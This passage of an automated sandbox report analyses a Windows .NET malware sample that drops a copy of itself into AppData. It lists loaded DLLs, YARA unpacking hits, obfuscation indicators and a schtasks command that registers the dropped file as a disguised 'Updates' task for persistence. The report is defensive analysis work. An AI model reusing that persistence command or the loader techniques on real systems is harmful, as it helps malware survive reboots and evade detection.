                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: gunzipped.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: gunzipped.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: gunzipped.exe, Customer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: mPvIOxEZXJsdYp.exe.0.dr, Customer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs.Net Code: nqR0o9sBDELYtmXPGJ6 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs.Net Code: nqR0o9sBDELYtmXPGJ6 System.Reflection.Assembly.Load(byte[])
                      Yara detected aPLib compressed binary
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052EDDA1 push ebx; ret 0_2_052EDDA8
                      Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052E9EA0 push eax; mov dword ptr [esp], ecx0_2_052E9EA4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585F887 pushad ; retf 8_2_0585F888
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0585F87D pushad ; retf 8_2_0585F87E
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_072248E7 push es; ret 8_2_0722490C
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 8_2_0742AAB2 push ds; ret 8_2_0742AAB3
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AD4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_00402AC0 push eax; ret 13_2_00402AFC
                      Source: gunzipped.exeStatic PE information: section name: .text entropy: 7.958469565640936
                      Source: mPvIOxEZXJsdYp.exe.0.drStatic PE information: section name: .text entropy: 7.958469565640936
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, bqm8VYzAoI4TqX0HlQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pggOlnLVtw', 'GCnOLISRm7', 'L3xO2ORmMg', 'NdMOeHmSi8', 'UXqOEnElsb', 'FyqOOBnNQN', 'TS0OYZ4NOf'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, TBf20b07Pm0yAXHpaX.csHigh entropy of concatenated method names: 'UUvW6LdP1', 'mHr8x0cEH', 'UXPhVKxn4', 'fvlg3IZAy', 'irrUNUbB1', 'eCldUGynG', 'mf61ydnNeuI55gRfRG', 'suMk0wr38nxm7KVlO1', 'STkEEmrac', 'jyQYhdkrN'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, lfMEOk1XbiFlh7aNLt.csHigh entropy of concatenated method names: 'KF9Pon0STn', 't69PA64Vkc', 'aSHPmrCiA0', 'a1rPqTDHiJ', 'cinPLnmYq6', 'gk2P2qw6Ic', 'oKIMS2CuiiVo5VmgFu', 'G7NL27uA9aAZJn0qPy', 'slxPPNKHnk', 'QahPtBKE1q'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, SrGMToCY8IuKIaqFwN.csHigh entropy of concatenated method names: 'ToString', 'DOf2j9F6fx', 'X2y2sggvVD', 'JhU25pYMP9', 'Fud2VKsqD0', 'f862NnD3pQ', 'nuX2H9AAu5', 'k362boR364', 'IZe2uX6Ge8', 'P6W244IAAK'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, WpAqRTfsZwXL6EEweX.csHigh entropy of concatenated method names: 'ERKemRshCS', 'FcXeqg58w5', 'ToString', 'aLVervj2Qw', 'uR7eJMHngJ', 'WExe9Y06AW', 'rCAeXaX3dv', 'DoMex0fnB5', 'v9LeofAvoH', 'IYweAq9vnV'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, dAALak3ZAtSNj79518.csHigh entropy of concatenated method names: 'PxgErR5Eob', 'YTmEJ4wGV5', 'q6sE9ptCBg', 'jb7EXsIRF7', 'FOeExvBS6y', 'GuwEotsLP6', 'cFmEAGCPS8', 'qN5EyQs0IL', 'cJEEmaIHxx', 'uroEqY8JmE'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, tG9fxIUSHrCiA0I1rT.csHigh entropy of concatenated method names: 'ofF98Ey09K', 'FTt9h9yJLm', 'lsO9TyQff4', 'vot9UP0Nmh', 'bXS9L8KIjo', 'ovZ928jMJW', 'PGK9eQk9lm', 'WHO9EJ2ZIx', 'KBZ9OQQmtL', 'Bqe9Y9m24b'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, XlBHpd48ALb7kEfdTk.csHigh entropy of concatenated method names: 'xpkop4PCCC', 'QZLoSTJXZX', 'l4voW5t6IY', 'AAAo8RDtSc', 'uq8onSHZZx', 'ba1oh5dchR', 'RIIogN0QN9', 'GHxoTo0dn1', 'rddoUsYdvN', 'w5uodmuqe2'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, tq6Jk2cqw6IcgF03NR.csHigh entropy of concatenated method names: 'bN6x736MGg', 'GqmxJA28Wi', 'K8txXSPrny', 'wJfxopXXDw', 'ldDxA1lLU3', 'skOXk0pKUK', 'UR9XZmAjCI', 'M1OXKTnnhi', 'Sh1X3PbFbO', 'eidXa8rPDH'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, eHdT6rwUbADaxa7kJW.csHigh entropy of concatenated method names: 'ojiOPBg4o0', 'qnpOtcwCUa', 'h2gO1OuHN7', 'MtxOr3Z98C', 'OtsOJDHiDk', 'HELOXIRDWG', 'avHOxqsmeT', 'L9gEKVBPIv', 'Dm1E3Tdy1f', 'OJfEaXrf3y'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, B8eLaGJcwW1e49fRCP.csHigh entropy of concatenated method names: 'Dispose', 'cF9PaWeBEx', 'ESx0sSWB8i', 'FU8oo6CK4U', 'f1APwALakZ', 'ktSPzNj795', 'ProcessDialogKey', 'd8o0IKdPSj', 'AIC0Pe2FBf', 'QNK007HdT6'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, ulQeCjbMDHB7w4nCRw.csHigh entropy of concatenated method names: 'ol0or6Mqvf', 'CFKo91i2ED', 'q60oxtbc62', 'sPCxwHqDyT', 'zXOxzHCfCN', 'IrAoItG9sl', 'uO3oPfRYhp', 'Bd0o0dYOHC', 'vluotdpy9Q', 'DQPo16w0hQ'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, f8l6ydsUUxLZBoHa0q.csHigh entropy of concatenated method names: 'q32d5Vg6lKGoY21OJ6k', 'n7TrFGg7UBKsHeJZjwj', 'EdtxEkPPHl', 'VvQxOU81fS', 'L7KxYdtkiW', 'GCduyLgZ1fU9FWIONgA', 'RtIo7Igw7r7eX6Bp0UG'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, jKdPSjanICe2FBfQNK.csHigh entropy of concatenated method names: 'aSKEcfjHJL', 'aJ9EsCE85D', 'ACbE5UBhNk', 'dmvEVFjRh6', 'el0EBpf25p', 'bxUEN8rjvg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, NHiJx8dK0vlYEtinnm.csHigh entropy of concatenated method names: 'P4ZXnaYjOb', 'd54XgO10ZT', 'vyA959loDW', 'smZ9VKZlvh', 'Fbq9ND3jF0', 'CIs9H4n76H', 'ai29befJMi', 'pNv9uXWquC', 'Gjx94IEHpw', 'cM69Db87t8'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, XJp8yKPI9TCfdAga7UT.csHigh entropy of concatenated method names: 'K2jOpXFQh4', 'sD0OS7tueF', 'nUkOWpIRqa', 'YTjO8psTxO', 'H8xOnQVMtO', 'cAgOhLUy0L', 'NhGOgH6Yqs', 'W7VOTeOLd7', 'yEuOU7BGfG', 'IwVOdTN9oJ'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, vtoUeaQlyeJCI1QUmm.csHigh entropy of concatenated method names: 'N5AlTQ8VeN', 'ayalULLxgG', 'XSolcRjgte', 'ooGlsa8tBG', 'kvQlVnLs2Y', 'UAdlNSWTiQ', 'KGClbx0gD3', 'd7IluyIE8q', 'nHalDi8HN4', 'iw6ljaB46o'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.csHigh entropy of concatenated method names: 'opet7oIWjR', 'B28tr1tH8M', 'S9FtJwJ5m3', 'hgmt9kZH15', 'j76tXNnpMu', 'ajhtxU8hfF', 'KrFto2n5bD', 'H5VtANCb8f', 'GFptyobMM4', 'LvqtmenBiL'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, HEfuBjPtoGIsVlP13HW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TgIYBqNlei', 'ut3YvhyOQw', 'jMTYCDXek9', 'r6EYf54Ehe', 'JLCYkcIieF', 'wBUYZYpDgb', 'CXnYK14ufB'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, hn0STnT66964Vkc389.csHigh entropy of concatenated method names: 'dnaJBL7Iua', 'NsJJvExmgi', 'PChJC5mS4S', 'svZJfqFVki', 'r39JkA9JeS', 'w86JZLpig5', 'ICQJKgp1R4', 'OdrJ3rIVRD', 'VLQJa4W9jw', 'VbxJwifLkH'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, MJclrqZHjO7Fdl7QeF.csHigh entropy of concatenated method names: 'qu4e3Ik1Mh', 'nlkewg5aJx', 'cXCEIA5YP7', 'mVEEPqWQmP', 'z2Rej2TYJg', 'XmReGaTvJv', 'mY0eQmwCc7', 'qT0eBqeccR', 'iCQevDXc5Z', 'DRBeCy2avH'
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, bqm8VYzAoI4TqX0HlQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pggOlnLVtw', 'GCnOLISRm7', 'L3xO2ORmMg', 'NdMOeHmSi8', 'UXqOEnElsb', 'FyqOOBnNQN', 'TS0OYZ4NOf'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, TBf20b07Pm0yAXHpaX.csHigh entropy of concatenated method names: 'UUvW6LdP1', 'mHr8x0cEH', 'UXPhVKxn4', 'fvlg3IZAy', 'irrUNUbB1', 'eCldUGynG', 'mf61ydnNeuI55gRfRG', 'suMk0wr38nxm7KVlO1', 'STkEEmrac', 'jyQYhdkrN'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, lfMEOk1XbiFlh7aNLt.csHigh entropy of concatenated method names: 'KF9Pon0STn', 't69PA64Vkc', 'aSHPmrCiA0', 'a1rPqTDHiJ', 'cinPLnmYq6', 'gk2P2qw6Ic', 'oKIMS2CuiiVo5VmgFu', 'G7NL27uA9aAZJn0qPy', 'slxPPNKHnk', 'QahPtBKE1q'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, SrGMToCY8IuKIaqFwN.csHigh entropy of concatenated method names: 'ToString', 'DOf2j9F6fx', 'X2y2sggvVD', 'JhU25pYMP9', 'Fud2VKsqD0', 'f862NnD3pQ', 'nuX2H9AAu5', 'k362boR364', 'IZe2uX6Ge8', 'P6W244IAAK'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, WpAqRTfsZwXL6EEweX.csHigh entropy of concatenated method names: 'ERKemRshCS', 'FcXeqg58w5', 'ToString', 'aLVervj2Qw', 'uR7eJMHngJ', 'WExe9Y06AW', 'rCAeXaX3dv', 'DoMex0fnB5', 'v9LeofAvoH', 'IYweAq9vnV'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, dAALak3ZAtSNj79518.csHigh entropy of concatenated method names: 'PxgErR5Eob', 'YTmEJ4wGV5', 'q6sE9ptCBg', 'jb7EXsIRF7', 'FOeExvBS6y', 'GuwEotsLP6', 'cFmEAGCPS8', 'qN5EyQs0IL', 'cJEEmaIHxx', 'uroEqY8JmE'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, tG9fxIUSHrCiA0I1rT.csHigh entropy of concatenated method names: 'ofF98Ey09K', 'FTt9h9yJLm', 'lsO9TyQff4', 'vot9UP0Nmh', 'bXS9L8KIjo', 'ovZ928jMJW', 'PGK9eQk9lm', 'WHO9EJ2ZIx', 'KBZ9OQQmtL', 'Bqe9Y9m24b'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, XlBHpd48ALb7kEfdTk.csHigh entropy of concatenated method names: 'xpkop4PCCC', 'QZLoSTJXZX', 'l4voW5t6IY', 'AAAo8RDtSc', 'uq8onSHZZx', 'ba1oh5dchR', 'RIIogN0QN9', 'GHxoTo0dn1', 'rddoUsYdvN', 'w5uodmuqe2'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, tq6Jk2cqw6IcgF03NR.csHigh entropy of concatenated method names: 'bN6x736MGg', 'GqmxJA28Wi', 'K8txXSPrny', 'wJfxopXXDw', 'ldDxA1lLU3', 'skOXk0pKUK', 'UR9XZmAjCI', 'M1OXKTnnhi', 'Sh1X3PbFbO', 'eidXa8rPDH'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, eHdT6rwUbADaxa7kJW.csHigh entropy of concatenated method names: 'ojiOPBg4o0', 'qnpOtcwCUa', 'h2gO1OuHN7', 'MtxOr3Z98C', 'OtsOJDHiDk', 'HELOXIRDWG', 'avHOxqsmeT', 'L9gEKVBPIv', 'Dm1E3Tdy1f', 'OJfEaXrf3y'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, B8eLaGJcwW1e49fRCP.csHigh entropy of concatenated method names: 'Dispose', 'cF9PaWeBEx', 'ESx0sSWB8i', 'FU8oo6CK4U', 'f1APwALakZ', 'ktSPzNj795', 'ProcessDialogKey', 'd8o0IKdPSj', 'AIC0Pe2FBf', 'QNK007HdT6'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, ulQeCjbMDHB7w4nCRw.csHigh entropy of concatenated method names: 'ol0or6Mqvf', 'CFKo91i2ED', 'q60oxtbc62', 'sPCxwHqDyT', 'zXOxzHCfCN', 'IrAoItG9sl', 'uO3oPfRYhp', 'Bd0o0dYOHC', 'vluotdpy9Q', 'DQPo16w0hQ'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, f8l6ydsUUxLZBoHa0q.csHigh entropy of concatenated method names: 'q32d5Vg6lKGoY21OJ6k', 'n7TrFGg7UBKsHeJZjwj', 'EdtxEkPPHl', 'VvQxOU81fS', 'L7KxYdtkiW', 'GCduyLgZ1fU9FWIONgA', 'RtIo7Igw7r7eX6Bp0UG'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, jKdPSjanICe2FBfQNK.csHigh entropy of concatenated method names: 'aSKEcfjHJL', 'aJ9EsCE85D', 'ACbE5UBhNk', 'dmvEVFjRh6', 'el0EBpf25p', 'bxUEN8rjvg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, NHiJx8dK0vlYEtinnm.csHigh entropy of concatenated method names: 'P4ZXnaYjOb', 'd54XgO10ZT', 'vyA959loDW', 'smZ9VKZlvh', 'Fbq9ND3jF0', 'CIs9H4n76H', 'ai29befJMi', 'pNv9uXWquC', 'Gjx94IEHpw', 'cM69Db87t8'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, XJp8yKPI9TCfdAga7UT.csHigh entropy of concatenated method names: 'K2jOpXFQh4', 'sD0OS7tueF', 'nUkOWpIRqa', 'YTjO8psTxO', 'H8xOnQVMtO', 'cAgOhLUy0L', 'NhGOgH6Yqs', 'W7VOTeOLd7', 'yEuOU7BGfG', 'IwVOdTN9oJ'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, vtoUeaQlyeJCI1QUmm.csHigh entropy of concatenated method names: 'N5AlTQ8VeN', 'ayalULLxgG', 'XSolcRjgte', 'ooGlsa8tBG', 'kvQlVnLs2Y', 'UAdlNSWTiQ', 'KGClbx0gD3', 'd7IluyIE8q', 'nHalDi8HN4', 'iw6ljaB46o'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.csHigh entropy of concatenated method names: 'opet7oIWjR', 'B28tr1tH8M', 'S9FtJwJ5m3', 'hgmt9kZH15', 'j76tXNnpMu', 'ajhtxU8hfF', 'KrFto2n5bD', 'H5VtANCb8f', 'GFptyobMM4', 'LvqtmenBiL'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, HEfuBjPtoGIsVlP13HW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TgIYBqNlei', 'ut3YvhyOQw', 'jMTYCDXek9', 'r6EYf54Ehe', 'JLCYkcIieF', 'wBUYZYpDgb', 'CXnYK14ufB'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, hn0STnT66964Vkc389.csHigh entropy of concatenated method names: 'dnaJBL7Iua', 'NsJJvExmgi', 'PChJC5mS4S', 'svZJfqFVki', 'r39JkA9JeS', 'w86JZLpig5', 'ICQJKgp1R4', 'OdrJ3rIVRD', 'VLQJa4W9jw', 'VbxJwifLkH'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, MJclrqZHjO7Fdl7QeF.csHigh entropy of concatenated method names: 'qu4e3Ik1Mh', 'nlkewg5aJx', 'cXCEIA5YP7', 'mVEEPqWQmP', 'z2Rej2TYJg', 'XmReGaTvJv', 'mY0eQmwCc7', 'qT0eBqeccR', 'iCQevDXc5Z', 'DRBeCy2avH'
                      Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
